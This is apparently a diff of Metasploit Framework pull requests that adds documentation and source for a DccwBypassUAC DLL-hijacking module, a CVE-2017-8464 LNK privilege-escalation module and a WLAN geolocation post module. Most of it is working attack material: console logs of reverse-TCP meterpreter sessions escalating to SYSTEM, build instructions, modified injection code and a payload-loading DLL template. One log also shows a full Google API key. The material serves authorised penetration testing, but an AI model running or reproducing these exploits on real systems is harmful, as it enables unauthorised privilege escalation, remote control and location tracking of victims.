1 meterpreter x86/windows WIN10X86-1511\msfuser @ WIN10X86-1511 <MSF_IP>:30009 -> <Win10x86_IP>:50041 (<Win10x86_IP>)
|
||||||
|
|
||||||
|
> use exploit/windows/local/bypassuac_injection_winsxs
|
||||||
|
> set session 1
|
||||||
|
session => 1
|
||||||
|
> set target 0
|
||||||
|
target => 0
|
||||||
|
> set payload windows/meterpreter/reverse_tcp
|
||||||
|
payload => windows/meterpreter/reverse_tcp
|
||||||
|
> set lhost <MSF_IP>
|
||||||
|
lhost => <MSF_IP>
|
||||||
|
> set lport 30010
|
||||||
|
lport => 30010
|
||||||
|
> set verbose true
|
||||||
|
verbose => true
|
||||||
|
> show options
|
||||||
|
|
||||||
|
Module options (exploit/windows/local/bypassuac_injection_winsxs):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
SESSION 1 yes The session to run this module on.
|
||||||
|
|
||||||
|
|
||||||
|
Payload options (windows/meterpreter/reverse_tcp):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||||
|
LHOST <MSF_IP> yes The listen address
|
||||||
|
LPORT 30010 yes The listen port
|
||||||
|
|
||||||
|
|
||||||
|
Exploit target:
|
||||||
|
|
||||||
|
Id Name
|
||||||
|
-- ----
|
||||||
|
0 Windows x86
|
||||||
|
|
||||||
|
|
||||||
|
> run -j
|
||||||
|
[*] Exploit running as background job.
|
||||||
|
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-meterpreter-reverse_tcp-192x168x134x160-30009.rc)> Ruby Code (13 bytes)
|
||||||
|
[*] Started reverse TCP handler on <MSF_IP>:30010
|
||||||
|
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-meterpreter-reverse_tcp-192x168x134x160-30009.rc)> Ruby Code (12 bytes)
|
||||||
|
[+] Windows 10 (Build 10586). may be vulnerable.
|
||||||
|
[*] UAC is Enabled, checking level...
|
||||||
|
[*] Checking admin status...
|
||||||
|
[+] Part of Administrators group! Continuing...
|
||||||
|
[+] UAC is set to Default
|
||||||
|
[+] BypassUAC can bypass this setting, continuing...
|
||||||
|
[*] Creating temporary folders...
|
||||||
|
[*] Uploading the Payload DLL to the filesystem...
|
||||||
|
[*] Payload DLL 18944 bytes long being uploaded...
|
||||||
|
[*] Spawning process with Windows Publisher Certificate, to inject into...
|
||||||
|
[*] Injecting into process ID 3476
|
||||||
|
[*] Opening process 3476
|
||||||
|
[*] Injecting struct into 3476
|
||||||
|
[*] Executing payload
|
||||||
|
[+] Successfully injected payload in to process: 3476
|
||||||
|
[*] Sending stage (957487 bytes) to <Win10x86_IP>
|
||||||
|
[*] Meterpreter session 2 opened (<MSF_IP>:30010 -> <Win10x86_IP>:50078) at 2017-10-03 12:19:03 -0700
|
||||||
|
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
|
||||||
|
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
|
||||||
|
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
|
||||||
|
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
|
||||||
|
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
|
||||||
|
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
|
||||||
|
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
|
||||||
|
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
|
||||||
|
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
|
||||||
|
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
|
||||||
|
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
|
||||||
|
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
|
||||||
|
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
|
||||||
|
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
|
||||||
|
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
|
||||||
|
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
|
||||||
|
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the file specified.
|
||||||
|
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the file specified.
|
||||||
|
[+] All the dropped elements have been successfully removed
|
||||||
|
> sessions -l
|
||||||
|
|
||||||
|
Active sessions
|
||||||
|
===============
|
||||||
|
|
||||||
|
Id Type Information Connection
|
||||||
|
-- ---- ----------- ----------
|
||||||
|
1 meterpreter x86/windows WIN10X86-1511\msfuser @ WIN10X86-1511 <MSF_IP>:30009 -> <Win10x86_IP>:50041 (<Win10x86_IP>)
|
||||||
|
2 meterpreter x86/windows WIN10X86-1511\msfuser @ WIN10X86-1511 <MSF_IP>:30010 -> <Win10x86_IP>:50078 (<Win10x86_IP>)
|
||||||
|
|
||||||
|
> sessions -C getuid
|
||||||
|
[*] Running 'getuid' on meterpreter session 1 (<Win10x86_IP>)
|
||||||
|
Server username: WIN10X86-1511\msfuser
|
||||||
|
[*] Running 'getuid' on meterpreter session 2 (<Win10x86_IP>)
|
||||||
|
Server username: WIN10X86-1511\msfuser
|
||||||
|
> sessions -C getsystem
|
||||||
|
[*] Running 'getsystem' on meterpreter session 1 (<Win10x86_IP>)
|
||||||
|
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
|
||||||
|
[-] Named Pipe Impersonation (In Memory/Admin)
|
||||||
|
[-] Named Pipe Impersonation (Dropper/Admin)
|
||||||
|
[-] Token Duplication (In Memory/Admin)
|
||||||
|
[*] Running 'getsystem' on meterpreter session 2 (<Win10x86_IP>)
|
||||||
|
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
|
||||||
|
> sessions -C getuid
|
||||||
|
[*] Running 'getuid' on meterpreter session 1 (<Win10x86_IP>)
|
||||||
|
Server username: WIN10X86-1511\msfuser
|
||||||
|
[*] Running 'getuid' on meterpreter session 2 (<Win10x86_IP>)
|
||||||
|
Server username: NT AUTHORITY\SYSTEM
|
||||||
|
> exit -y
|
||||||
|
```
|
||||||
|
|
||||||
|
## Compiling Instructions
|
||||||
|
### Compiling Template DLLs
|
||||||
|
To build the x86 template dll, use data/templates/src/pe/dll_gdiplus/build.sh
|
||||||
|
(Requires mingw-w64 package from apt)
|
||||||
|
```
|
||||||
|
cd data/templates/src/pe/dll_gdiplus
|
||||||
|
./build.sh
|
||||||
|
cp data/templates/src/pe/dll_gdiplus/template_x86_windows.dll data/templates/template_x86_windows_dccw_gdiplus.dll
|
||||||
|
```
|
||||||
|
To build the x64 binary
|
||||||
|
(In an x64 VS2013 command prompt)
|
||||||
|
```
|
||||||
|
Z:\metasploit-framework\data\templates\src\pe\dll_gdiplus>cl.exe -LD template.c /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain "kernel32.lib"
|
||||||
|
cp data/templates/src/pe/dll_gdiplus/template.dll data/templates/template_x64_windows_dccw_gdiplus.dll
|
||||||
|
```
|
||||||
|
|
||||||
|
### Compiling bypassuac-x86.dll and bypassuac-x64.dll
|
||||||
|
Open the Visual studio solution located in
|
||||||
|
metasploit-framework/external/source/exploits/bypassuac_injection/
|
||||||
|
Choose ```release``` from the Solution configurations, build the x86 and x64 solutions. The binaries should already
|
||||||
|
be in the right place.
|
||||||
|
|
||||||
|
# More information
|
||||||
|
(From PR)
|
||||||
|
|
||||||
|
I decided to create a different module and not to update the one called "bypassuac_injection", because in order to
|
||||||
|
perform a DLL hijacking, I need to create several folders in which insert our malicious DLL. Also, I deleted these
|
||||||
|
files and folders in a different way, instead using the method "register_file_for_cleanup()", so as to be able to
|
||||||
|
remove the created folders and also prevent a very large output.
|
||||||
|
|
||||||
|
If you want to understand the module in a deeper way I recommend you to visit the C++ project on my github:
|
||||||
|
https://github.com/L3cr0f/DccwBypassUAC
|
||||||
|
|
||||||
|
## **DLL INJECTION**
|
||||||
|
**/metasploit-framework/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp
|
||||||
|
/metasploit-framework/data/post/bypassuac-x64.dll
|
||||||
|
/metasploit-framework/data/post/bypassuac-x86.dll**
|
||||||
|
|
||||||
|
To perform the DLL hijacking we need to copy the file of our interest to a specific location (in our case "C:\Windows\System32\") using IFileOperation. To do so, first we need to inject a DLL that will perform this task. This DLL is almost the same as the one used in the "bypassuac_injection" module, but, in latest Windows 10 systems (build equal or greater than 15003), the IFileOperation must be invoked in a different way so as to not trigger the UAC prompt. This modification will be:
|
||||||
|
|
||||||
|
`if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)`
|
||||||
|
|
||||||
|
to
|
||||||
|
|
||||||
|
`if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)`
|
||||||
|
|
||||||
|
Note that this modification does not affect other modules.
|
||||||
|
To conclude this section, I didn't found the code of "/metasploit-framework/data/post/bypassuac-[ARCH].exe" to update it.
|
||||||
|
|
||||||
|
## **DLL HIJACKING**
|
||||||
|
**/metasploit-framework/data/templates/template_x86_windows_dccw_gdiplus.dll
|
||||||
|
/metasploit-framework/data/templates/template_x64_windows_dccw_gdiplus.dll
|
||||||
|
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.c
|
||||||
|
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.h
|
||||||
|
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.def
|
||||||
|
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.rc
|
||||||
|
/metasploit-framework/data/templates/src/pe/dll_gdiplus/build.sh
|
||||||
|
/metasploit-framework/lib/msf/core/exploit/exe.rb
|
||||||
|
/metasploit-framework/lib/msf/util/exe.rb**
|
||||||
|
|
||||||
|
To execute code at high integrity we need to perform a DLL hijacking, but we cannot use the DLL templates provided by
|
||||||
|
Metasploit since we need to forward some functions to the legit DLL, so we need to create a new couple of DLL templates,
|
||||||
|
which are exactly the same but including the forwarding feature (the way I have implemented does not work on Windows 7).
|
||||||
|
Now, despite working in a successfully way, I think it would be great including this forwarding feature on the fly, I mean,
|
||||||
|
without having to create an additional DLL template. I don't know how this can be done, so if you come up with something,
|
||||||
|
let me know.
|
||||||
|
|
||||||
|
Also, to load the previous DLL template we have modified the mentioned "exe.rb" files.
|
||||||
|
|
||||||
|
## **Setup the vulnerable environment**
|
||||||
|
|
||||||
|
The vulnerable environment setup is the same as the module "bypassuac_injection", we need a meterpreter session, select
|
||||||
|
the architecture (0 for x86 and 1 for x64), select the meterpreter payload based on the architecture we want to execute
|
||||||
|
with high integrity and set the regular parameters of the payload (LHOST, LPORT, etc).
|
|
@ -0,0 +1,166 @@
|
||||||
|
## Description
|
||||||
|
This module is a Windows local exploit version of the existing file
|
||||||
|
format module for CVE-2017-8464. The module works by dropping the
|
||||||
|
specially crafted LNK file and DLL to disk, which causes
|
||||||
|
`SearchProtocolHost.exe` to parse the LNK file and thus load the DLL via
|
||||||
|
the vulnerability. Due to `SearchProtocolHost.exe` running as SYSTEM,
|
||||||
|
this can be used to elevate privileges.
|
||||||
|
|
||||||
|
The original DLL template needed some significant reworking to make it
|
||||||
|
compatible for execution within `SearchProtocolHost.exe`. The payload
|
||||||
|
was originally failing in the hollowed child `rundll32.exe` process with
|
||||||
|
a denied error from winsock. This was addressed by checking if the process
|
||||||
|
which loaded the crafted DLL is `SearchProtocolHost.exe` and when it is,
|
||||||
|
it opens the token of another SYSTEM process and passes it to
|
||||||
|
`CreateProcessAsUser` for the payload to work. When the DLL is loaded
|
||||||
|
into another process or is not running as SYSTEM, this step is skipped
|
||||||
|
and `NULL` is passed as the token.
|
||||||
|
|
||||||
|
Finally a thread is spawned to keep a module reference and monitor the
|
||||||
|
child process. This is for synchronization to prevent the payload from
|
||||||
|
being executed in rapid succession from a single exploitation attempt.
|
||||||
|
The mutex was also updated to the constant of `MUTEX!!!` to leverage
|
||||||
|
Metasploit's builtin mutex name randomization, which ensures that a name
|
||||||
|
is unique per module run but not globally unique.
|
||||||
|
|
||||||
|
## Vulnerable Systems
|
||||||
|
Tested and works on
|
||||||
|
Windows 7x64 SP0
|
||||||
|
Windows 7x64 SP1
|
||||||
|
Windows 8x64
|
||||||
|
Windows 8.1x64
|
||||||
|
Windows 10x64 Build 1511
|
||||||
|
Windows 10x64 Build 1607
|
||||||
|
Windows 10x64 Build 1703
|
||||||
|
|
||||||
|
## Running Example:
|
||||||
|
```
|
||||||
|
> use exploit/multi/handler
|
||||||
|
> set payload windows/x64/meterpreter/reverse_tcp
|
||||||
|
payload => windows/x64/meterpreter/reverse_tcp
|
||||||
|
> set LHOST 192.168.135.112
|
||||||
|
LHOST => 192.168.135.112
|
||||||
|
> set LPORT 30001
|
||||||
|
LPORT => 30001
|
||||||
|
> show options
|
||||||
|
|
||||||
|
Module options (exploit/multi/handler):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
|
||||||
|
|
||||||
|
Payload options (windows/x64/meterpreter/reverse_tcp):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||||
|
LHOST 192.168.135.112 yes The listen address
|
||||||
|
LPORT 30001 yes The listen port
|
||||||
|
|
||||||
|
|
||||||
|
Exploit target:
|
||||||
|
|
||||||
|
Id Name
|
||||||
|
-- ----
|
||||||
|
0 Wildcard Target
|
||||||
|
|
||||||
|
|
||||||
|
[*] > Ruby Code (13 bytes)
|
||||||
|
> run -z
|
||||||
|
[*] Exploit running as background job 0.
|
||||||
|
[*] Started reverse TCP handler on 192.168.135.112:30001
|
||||||
|
[*] Sending stage (205379 bytes) to 192.168.134.133
|
||||||
|
[*] Meterpreter session 1 opened (192.168.135.112:30001 -> 192.168.134.133:49178) at 2017-11-06 10:22:02 -0800
|
||||||
|
> sysinfo
|
||||||
|
Computer : WIN7X64-SP0
|
||||||
|
OS : Windows 7 (Build 7600).
|
||||||
|
Architecture : x64
|
||||||
|
System Language : en_US
|
||||||
|
Domain : WORKGROUP
|
||||||
|
Logged On Users : 4
|
||||||
|
Meterpreter : x64/windows
|
||||||
|
> sessions -l
|
||||||
|
|
||||||
|
Active sessions
|
||||||
|
===============
|
||||||
|
|
||||||
|
Id Type Information Connection
|
||||||
|
-- ---- ----------- ----------
|
||||||
|
1 meterpreter x64/windows WIN7X64-SP0\msfuser @ WIN7X64-SP0 192.168.135.112:30001 -> 192.168.134.133:49178 (192.168.134.133)
|
||||||
|
|
||||||
|
> use exploit/windows/local/cve_2017_8464_lnk_lpe
|
||||||
|
> set session 1
|
||||||
|
session => 1
|
||||||
|
> set target 0
|
||||||
|
target => 0
|
||||||
|
> set payload windows/x64/meterpreter/reverse_tcp
|
||||||
|
payload => windows/x64/meterpreter/reverse_tcp
|
||||||
|
> set lhost 192.168.135.112
|
||||||
|
lhost => 192.168.135.112
|
||||||
|
> set lport 30002
|
||||||
|
lport => 30002
|
||||||
|
> set verbose true
|
||||||
|
verbose => true
|
||||||
|
> show options
|
||||||
|
|
||||||
|
Module options (exploit/windows/local/cve_2017_8464_lnk_lpe):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
DLLNAME no The DLL file containing the payload
|
||||||
|
FILENAME no The LNK file
|
||||||
|
PATH no An explicit path to where the files should be written to
|
||||||
|
SESSION 1 yes The session to run this module on.
|
||||||
|
|
||||||
|
|
||||||
|
Payload options (windows/x64/meterpreter/reverse_tcp):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||||
|
LHOST 192.168.135.112 yes The listen address
|
||||||
|
LPORT 30002 yes The listen port
|
||||||
|
|
||||||
|
|
||||||
|
Exploit target:
|
||||||
|
|
||||||
|
Id Name
|
||||||
|
-- ----
|
||||||
|
0 Windows x64
|
||||||
|
|
||||||
|
|
||||||
|
> run -j
|
||||||
|
[*] Exploit running as background job 1.
|
||||||
|
[*] Started reverse TCP handler on 192.168.135.112:30002
|
||||||
|
[*] Generating LNK file to load: C:\Users\msfuser\QtGyQHZpWvmzjdsn.dll
|
||||||
|
[*] Sending stage (205379 bytes) to 192.168.134.133
|
||||||
|
[*] Meterpreter session 2 opened (192.168.135.112:30002 -> 192.168.134.133:49179) at 2017-11-06 10:23:03 -0800
|
||||||
|
[*] Waiting 15s before file cleanup...
|
||||||
|
[+] Deleted C:\Users\msfuser\HADoIQMbEQDpbbRn.lnk
|
||||||
|
[+] Deleted C:\Users\msfuser\QtGyQHZpWvmzjdsn.dll
|
||||||
|
> sessions -l
|
||||||
|
|
||||||
|
Active sessions
|
||||||
|
===============
|
||||||
|
|
||||||
|
Id Type Information Connection
|
||||||
|
-- ---- ----------- ----------
|
||||||
|
1 meterpreter x64/windows WIN7X64-SP0\msfuser @ WIN7X64-SP0 192.168.135.112:30001 -> 192.168.134.133:49178 (192.168.134.133)
|
||||||
|
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN7X64-SP0 192.168.135.112:30002 -> 192.168.134.133:49179 (192.168.134.133)
|
||||||
|
|
||||||
|
> getuid
|
||||||
|
Server username: WIN7X64-SP0\msfuser
|
||||||
|
Server username: NT AUTHORITY\SYSTEM
|
||||||
|
> getsystem
|
||||||
|
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
|
||||||
|
> getuid
|
||||||
|
Server username: NT AUTHORITY\SYSTEM
|
||||||
|
> exit -y
|
||||||
|
```
|
||||||
|
|
||||||
|
## Compiling instructions
|
||||||
|
`cd ./external/source/exploits/cve-2017-8464`
|
||||||
|
`./build.sh`
|
||||||
|
|
||||||
|
(Requires `mingw-w64` package)
|
|
@ -0,0 +1,66 @@
|
||||||
|
## Creating A Testing Environment
|
||||||
|
|
||||||
|
For this module to work you need a box with a wireless adapter. The following methods are used to gather
|
||||||
|
wireless information from the host:
|
||||||
|
|
||||||
|
- Windows: `netsh wlan show networks mode=bssid`
|
||||||
|
- OSX: `/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s`
|
||||||
|
- Linux: `iwlist scanning`
|
||||||
|
- Solaris: `dladm scan-wifi`
|
||||||
|
- BSD: `dmesg | grep -i wlan | cut -d ':' -f1 | uniq"`
|
||||||
|
|
||||||
|
If `GEOLOCATE` is set to true, Google's [GeoLocation APIs](https://developers.google.com/maps/documentation/geolocation/intro) are utilized.
|
||||||
|
These APIs require a Google [API key](https://developers.google.com/maps/documentation/geolocation/get-api-key) to use them. The original
|
||||||
|
methodology used by this module in [#3280](https://github.com/rapid7/metasploit-framework/pull/3280),
|
||||||
|
which didn't require an API key, was found to no longer work in [#8928](https://github.com/rapid7/metasploit-framework/issues/8928).
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Start msfconsole
|
||||||
|
2. Obatin a meterpreter session via whatever method
|
||||||
|
3. Do: `use post/multi/gather/wlan_geolocate`
|
||||||
|
4. Do: `set session #`
|
||||||
|
5. Do: `set apikey [key]`
|
||||||
|
5. Do: `run`
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
**geolocate**
|
||||||
|
|
||||||
|
A boolean on if wireless information should only be gathered, or the Google geolocate API should be used to geo the victim. Defaults to `false`
|
||||||
|
|
||||||
|
**apikey**
|
||||||
|
|
||||||
|
A string containing the Google provided geolocation api key. **REQUIRED** if `geolocate` is set to true. Defaults to empty string
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Windows 10
|
||||||
|
|
||||||
|
resource (met_rev.rc)> use exploit/multi/handler
|
||||||
|
resource (met_rev.rc)> set payload windows/meterpreter/reverse_tcp
|
||||||
|
payload => windows/meterpreter/reverse_tcp
|
||||||
|
resource (met_rev.rc)> setg lhost 2.2.2.2
|
||||||
|
lhost => 2.2.2.2
|
||||||
|
resource (met_rev.rc)> set lport 9876
|
||||||
|
lport => 9876
|
||||||
|
resource (met_rev.rc)> setg verbose true
|
||||||
|
verbose => true
|
||||||
|
resource (met_rev.rc)> exploit
|
||||||
|
[*] Exploit running as background job 0.
|
||||||
|
[*] Started reverse TCP handler on 2.2.2.2:9876
|
||||||
|
[*] Sending stage (179267 bytes) to 1.1.1.1
|
||||||
|
[*] Meterpreter session 1 opened (2.2.2.2:9876 -> 1.1.1.1:16111) at 2017-10-01 19:27:15 -0400
|
||||||
|
|
||||||
|
resource (met_rev.rc)> use post/multi/gather/wlan_geolocate
|
||||||
|
resource (met_rev.rc)> set geolocate true
|
||||||
|
geolocate => true
|
||||||
|
resource (met_rev.rc)> set session 1
|
||||||
|
session => 1
|
||||||
|
resource (met_rev.rc)> set apikey ANza1yFLhaK3lreck7N3S_GYbEtJE3gGg5dJe12
|
||||||
|
apikey => ANza1yFLhaK3lreck7N3S_GYbEtJE3gGg5dJe12
|
||||||
|
msf post(wlan_geolocate) > run
|
||||||
|
[+] Wireless list saved to loot.
|
||||||
|
[*] Google indicates the device is within 30.0 meters of 30.3861197,-97.7385878.
|
||||||
|
[*] Google Maps URL: https://maps.google.com/?q=30.3861197,-97.7385878
|
||||||
|
[*] Post module execution completed
|
|
@ -46,7 +46,7 @@ extern "C" {
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
|
||||||
if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)
|
if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)
|
||||||
{
|
{
|
||||||
dprintf("[BYPASSUACINJ] Couldn't Set operating flags on file op.");
|
dprintf("[BYPASSUACINJ] Couldn't Set operating flags on file op.");
|
||||||
break;
|
break;
|
||||||
|
|
|
@ -0,0 +1,17 @@
|
||||||
|
#!/bin/sh
|
||||||
|
rm -f *.o *.dll
|
||||||
|
|
||||||
|
CCx86="i686-w64-mingw32"
|
||||||
|
CCx64="x86_64-w64-mingw32"
|
||||||
|
|
||||||
|
${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
|
||||||
|
${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
|
||||||
|
${CCx64}-strip -s temp.dll -o ../../../../data/exploits/cve-2017-8464/template_x64_windows.dll
|
||||||
|
rm -f temp.dll *.o
|
||||||
|
chmod -x ../../../../data/exploits/cve-2017-8464/template_x64_windows.dll
|
||||||
|
|
||||||
|
${CCx86}-gcc -c -Os template.c -Wall -shared
|
||||||
|
${CCx86}-dllwrap --def template.def *.o -o temp.dll
|
||||||
|
${CCx86}-strip -s temp.dll -o ../../../../data/exploits/cve-2017-8464/template_x86_windows.dll
|
||||||
|
rm -f temp.dll *.o
|
||||||
|
chmod -x ../../../../data/exploits/cve-2017-8464/template_x86_windows.dll
|
|
@ -0,0 +1,241 @@
|
||||||
|
#include <windows.h>
|
||||||
|
#include <sddl.h>
|
||||||
|
#include <tchar.h>
|
||||||
|
#include <tlhelp32.h>
|
||||||
|
#include <userenv.h>
|
||||||
|
|
||||||
|
#include "template.h"
|
||||||
|
|
||||||
|
void ExecutePayload(HANDLE hDll);
|
||||||
|
|
||||||
|
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
|
||||||
|
switch (dwReason) {
|
||||||
|
case DLL_PROCESS_ATTACH:
|
||||||
|
ExecutePayload(hDll);
|
||||||
|
break;
|
||||||
|
|
||||||
|
case DLL_PROCESS_DETACH:
|
||||||
|
break;
|
||||||
|
|
||||||
|
case DLL_THREAD_ATTACH:
|
||||||
|
break;
|
||||||
|
|
||||||
|
case DLL_THREAD_DETACH:
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
return TRUE;
|
||||||
|
}
|
||||||
|
|
||||||
|
BOOL StringEndsWithStringA(LPCSTR szStr, LPCSTR szSuffix, BOOL bCaseSensitive) {
|
||||||
|
int result;
|
||||||
|
|
||||||
|
if (strlen(szStr) < strlen(szSuffix)) {
|
||||||
|
return FALSE;
|
||||||
|
}
|
||||||
|
if (bCaseSensitive) {
|
||||||
|
result = strcmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
result = _stricmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix);
|
||||||
|
}
|
||||||
|
return result == 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
BOOL GetProcessSid(HANDLE hProc, PSID *pSid) {
|
||||||
|
HANDLE hToken;
|
||||||
|
DWORD dwLength = 0;
|
||||||
|
TOKEN_USER *tuUser = NULL;
|
||||||
|
SIZE_T szSid = 0;
|
||||||
|
|
||||||
|
*pSid = NULL;
|
||||||
|
if (!OpenProcessToken(hProc, (TOKEN_READ), &hToken)) {
|
||||||
|
return FALSE;
|
||||||
|
}
|
||||||
|
|
||||||
|
GetTokenInformation(hToken, TokenUser, NULL, 0, &dwLength);
|
||||||
|
tuUser = (TOKEN_USER *)malloc(dwLength);
|
||||||
|
if (!tuUser) {
|
||||||
|
return FALSE;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!GetTokenInformation(hToken, TokenUser, tuUser, dwLength, &dwLength)) {
|
||||||
|
free(tuUser);
|
||||||
|
return FALSE;
|
||||||
|
}
|
||||||
|
|
||||||
|
szSid = GetLengthSid(tuUser->User.Sid);
|
||||||
|
*pSid = LocalAlloc(LPTR, szSid);
|
||||||
|
if ((*pSid) && (!CopySid((DWORD)szSid, *pSid, tuUser->User.Sid))) {
|
||||||
|
LocalFree(*pSid);
|
||||||
|
*pSid = NULL;
|
||||||
|
}
|
||||||
|
|
||||||
|
free(tuUser);
|
||||||
|
CloseHandle(hToken);
|
||||||
|
return *pSid != NULL;
|
||||||
|
}
|
||||||
|
|
||||||
|
BOOL IsProcessRunningAsSidString(HANDLE hProc, LPCTSTR sStringSid, PBOOL pbResult) {
|
||||||
|
PSID pTestSid = NULL;
|
||||||
|
PSID pTargetSid = NULL;
|
||||||
|
|
||||||
|
if (!ConvertStringSidToSid(sStringSid, &pTargetSid)) {
|
||||||
|
return FALSE;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!GetProcessSid(hProc, &pTestSid)) {
|
||||||
|
LocalFree(pTargetSid);
|
||||||
|
return FALSE;
|
||||||
|
}
|
||||||
|
|
||||||
|
*pbResult = EqualSid(pTestSid, pTargetSid);
|
||||||
|
LocalFree(pTargetSid);
|
||||||
|
LocalFree(pTestSid);
|
||||||
|
return TRUE;
|
||||||
|
}
|
||||||
|
|
||||||
|
DWORD FindProcessId(LPCTSTR szProcessName) {
|
||||||
|
HANDLE hProcessSnap;
|
||||||
|
PROCESSENTRY32 pe32;
|
||||||
|
DWORD result = 0;
|
||||||
|
|
||||||
|
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
|
||||||
|
if (hProcessSnap == INVALID_HANDLE_VALUE) {
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
pe32.dwSize = sizeof(PROCESSENTRY32);
|
||||||
|
if (!Process32First(hProcessSnap, &pe32)) {
|
||||||
|
CloseHandle(hProcessSnap);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
do {
|
||||||
|
if (!strcmp(szProcessName, pe32.szExeFile)) {
|
||||||
|
result = pe32.th32ProcessID;
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
} while (Process32Next(hProcessSnap, &pe32));
|
||||||
|
CloseHandle(hProcessSnap);
|
||||||
|
return result;
|
||||||
|
}
|
||||||
|
|
||||||
|
HANDLE GetPayloadToken(void) {
|
||||||
|
HANDLE hTokenHandle = NULL;
|
||||||
|
HANDLE hProcessHandle = NULL;
|
||||||
|
BOOL bIsSystem = FALSE;
|
||||||
|
DWORD dwPid = 0;
|
||||||
|
CHAR Path[MAX_PATH + 1];
|
||||||
|
|
||||||
|
ZeroMemory(Path, sizeof(Path));
|
||||||
|
GetModuleFileNameA(NULL, Path, MAX_PATH);
|
||||||
|
if (!StringEndsWithStringA(Path, "\\SearchProtocolHost.exe", TRUE)) {
|
||||||
|
return NULL;
|
||||||
|
}
|
||||||
|
/* loaded into the context of SearchProtocolHost.exe */
|
||||||
|
|
||||||
|
if (IsProcessRunningAsSystem(GetCurrentProcess(), &bIsSystem) && (!bIsSystem)) {
|
||||||
|
return NULL;
|
||||||
|
}
|
||||||
|
